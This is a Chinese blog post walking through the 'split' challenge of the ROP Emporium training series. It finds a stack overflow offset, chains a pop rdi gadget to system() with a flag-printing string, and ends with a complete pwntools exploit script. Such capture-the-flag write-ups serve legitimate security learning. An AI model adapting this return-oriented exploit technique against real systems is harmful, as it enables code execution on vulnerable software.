ROPEmporium通关全解(二)

最新推荐文章于 2022-04-21 16:45:26 发布
最新推荐文章于 2022-04-21 16:45:26 发布
阅读量389 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yalecaltech/article/details/103679351
版权

前言

  1. 关于ROP
    ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)
    ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。
  2. 本系列rop实战题目的背景
    来自ROPEmporium
    旨在通过解决一系列挑战来一步步进阶学习ROP利用技术。

操作
这一关是split
先使用file命令看一下
在这里插入图片描述
checksec
在这里插入图片描述
可以看到nx enabled,即开启了NX,也就是栈不可执行
先载入r2分析
在这里插入图片描述使用afl列出涉及的函数
在这里插入图片描述
看到了三个可能是比较重要的函数
main:开始分析的地方
pwnme,usefulfunction:提示的这么明显了
先反汇编main
在这里插入图片描述在上图中注意到其调用了pwnme
所以我们顺着分析pwnme
同样反汇编
在这里插入图片描述
从上图可以看到有一个32字节的缓冲区,可以通过fgets接收96字节的输入从而溢出,也是和上一题ret2win一样溢出rip吗?
我们先使用gdb分析
在这里插入图片描述
然后往input中写入随机的100字节的序列
在这里插入图片描述
将input作为输入运行
在这里插入图片描述
然后pattern_search
在这里插入图片描述可以看到溢出rsp需要40个字节,我们可以尝试通过调用其他函数吗,比如usefulfunction?
我们回到r2反汇编usefulfunction
在这里插入图片描述
我们可以看到它调用将执行/ bin / ls的system()函数。
这个函数的地址是0x00400807,所以我们需要40个字节的随机数据和这个地址。
简单的使用python生成exp写入input
在这里插入图片描述
然后在gdb中测试
在这里插入图片描述
可以看到成功执行了/bin/ls
不过我们的目标是打印flag,而不是ls,所以继续研究下去
回到r2中使用izz列出字符串
在这里插入图片描述我们在其中看到了
在这里插入图片描述可以打印flag的字符串
这个字符串的地址是0x0001060
现在我们尝试溢出栈,直接执行到system()
不过我们要找到一个办法,直接将这个地址传入RDI寄存器(x86-64传参时依次通过rdi,rsi,,,传参,rdi是第一个)
这时候我们就需要rop gadget了,简单地说,它们就是写以ret指令结尾的指令序列
在这里插入图片描述
找到了很多gadget,那么哪个符合要求呢
我们前面提到必须将值传入RDI,所以要找到pop rdi
所以符合要求的是地址是0x400883
我们传递这个gadget地址(0x400883)后,它会把栈中下一个值传到RDI寄存器中,所以下一个地址应该是能够打印flag的字符串的地址(0x601060),最后是system()函数的地址(0x400810)
使用python简单地将exp输出到input
在这里插入图片描述
在gdb中测试,可以看到成功打印出flag
在这里插入图片描述同样也可以通过pwntools快速写一个exp,完整代码在2.py

from pwn import *

io = process("./split")

elf = ELF("./split")

system_addr = elf.symbols['system']

pop_rdi_ret = 0x0000000000400883
cat_flag_addr = 0x601060

io.recvuntil(">")

payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB"
payload += p64(pop_rdi_ret)+p64(cat_flag_addr)+p64(system_addr)

io.sendline(payload)

io.interactive()

运行如图
在这里插入图片描述


题目来自ROPEmporium,另参考如下资源:

https://medium.com/@int0x33/
https://paper.seebug.org/272/
https://www.rootnetsec.com/
https://bestwing.me/ropemporium-all-writeup.html
https://firmianay.github.io/2017/11/02/rop_emporium.html
https://www.oipapio.com/cn/article-5389490
http://ascii.911cha.com/
https://www.bejson.com/convert/ox2str/
https://larry.ngrep.me/2018/06/14/rop-emporium-write-up/
https://www.voidsecurity.in/2013/07/some-gadget-sequence-for-x8664-rop.html
https://www.blackhat.com/docs/asia-18/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR.pdf
https://www.blackhat.com/docs/asia-18/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf
https://www.jianshu.com/p/a9ad38ad33e5
https://zhuanlan.zhihu.com/p/27339191
https://www.voidsecurity.in/2013/07/some-gadget-sequence-for-x8664-rop.html

Elwood Ying
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
小白详解rop emporium
BadRer的博客
08-02 2102
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
计算机级c语言通关秘籍45
09-12
计算机级c语言通关秘籍45
ROP Emporium ALL Challenge
Pwnpanda的博客
07-18 975
暑假刷题计划-0x00 水平有限,这些只是前面大部分题目的WP,最后几道题暂时没做 题目来源:ROP Emporium 工具&&环境:IDA Pro、gdb+peda、ROPgadget、radare2、Ubuntu 16 ROP: 一步一步学ROP之linux_x86篇 一步一步学ROP之linux_x64篇 友情链接: 大佬博客:https://firmian...
ROPEmporium通关全解(一)
Yale的博客
12-24 1037
前言 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战题目的背景 来自ROPEmporium 旨在通...
ROP_Emporium_ret2win
Starr
03-23 629
文章目录1. ret2win32信息收集反汇编Exp2. ret2win反汇编Exp 题目下载地址:ROP Emporium 1. ret2win32 信息收集 $ file ret2win32 ret2win32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e1
ROP Emporium x86_64 7~8题
CoLin的pwn小屋
04-21 368
ROP Emporium x64 7-8题
计算机级c语言通关秘籍7
09-12
计算机级c语言通关秘籍7
计算机级c语言通关秘籍6
09-12
计算机级c语言通关秘籍6
计算机级c语言通关秘籍5
09-12
计算机级c语言通关秘籍5
计算机级c语言通关秘籍4
09-12
计算机级c语言通关秘籍4
ROP Emporium 挑战 WP
hl1293348082的专栏
03-30 150
ROP Emporium 挑战是用来学习 ROP 技术的一系列挑战,本文就对于其中涉及的所有挑战记录一下 wirte up。 下载地址: https://ropemporium.com/ 虽然说简单,但是后面 badchar 后面的 rop 还是学到了不少东西的~ 程序默认开启 nx CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : Partia...
适合初学者的ROP攻击入门教程 - [Pwn] ROP Emporium Guide
HiTaQini
06-08 3062
ROP Emporium 是一个ROP攻击入门教学网站,提供了一系列的挑战任务,这些挑战对逆向工程或debug的要求不高,因此对初学者十分友好,适合初学者了解ROP攻击。网站中共有8个挑战任务,每个挑战都引入了一个新概念/知识点,其复杂性和难度逐渐增加,循序渐进,而且每个挑战都有32/64位两个版本的程序,适合初学者了解者之间的差异。
ROPEmporium通关全解(五)
Yale的博客
12-24 346
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战题目的背景 来自ROPEmporium...
ROP Emporium x86_64 1~6题
CoLin的pwn小屋
04-09 3278
ROP Emporium x64 1-6题
ROP_Emporium_pivot
Starr
03-27 2191
文章目录1. pivot32信息收集黑盒测试反汇编思路Exp2. pivot反汇编调试分析Exp3. 参考文章 如果esp和ebp能够被控制,那么整个堆栈就可以被控制,甚至被转移。Stack pivoting就是一种栈迁移技术,可以用来绕过NX,或者溢出空间太小的情况。 1. pivot32 信息收集 $ file pivot32 pivot32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, in
ROP_Emporium_split
Starr
03-24 258
文章目录1. split32信息收集黑盒测试反汇编Exp调试分析2. split黑盒测试反汇编Exp参考文章 1. split32 信息收集 $ file split32 split32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=76cb700a2ac0484f
ROPEmporium通关全解(三)
Yale的博客
12-24 386
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战题目的背景 来自ROPEmporium...
ROPEmporium通关全解(四)
Yale的博客
12-24 384
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战题目的背景 来自ROPEmporium...
信息系统项目管理师32小时通关版 pdf
最新发布
02-05
《信息系统项目管理师32小时通关版》是一本提供信息系统项目管理知识和技能的学习指南。这本书总共有32个小时的内容,帮助读者全面了解信息系统项目管理的各个方面。 这本书的第版相比于第一版进行了更新和改进,更加贴近当前的项目管理实践和行业标准。通过阅读这本书,读者可以系统地学习和掌握信息系统项目管理的基本概念、流程和技术工具。 《信息系统项目管理师32小时通关版》的内容包括项目管理的一般原则和实践、项目范围管理、时间管理、成本管理、质量管理、人力资源管理、沟通管理、风险管理、采购管理等多个方面。每个主题都通过案例分析、实践技巧和练习题等方式进行讲解,帮助读者理解和应用所学知识。 这本书的特点是内容简洁明了,结构清晰,适合初学者入门和已经从事项目管理工作的人进一步提升自己的技能。读者可以按照自己的学习进度,分配32个小时进行学习,也可以根据自己的需求选择性地阅读相关章节。 总之,《信息系统项目管理师32小时通关版》是一本权威且实用的项目管理学习资料,对于想要提升自己在信息系统项目管理领域的能力和水平的人来说是一本不可多得的参考书。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值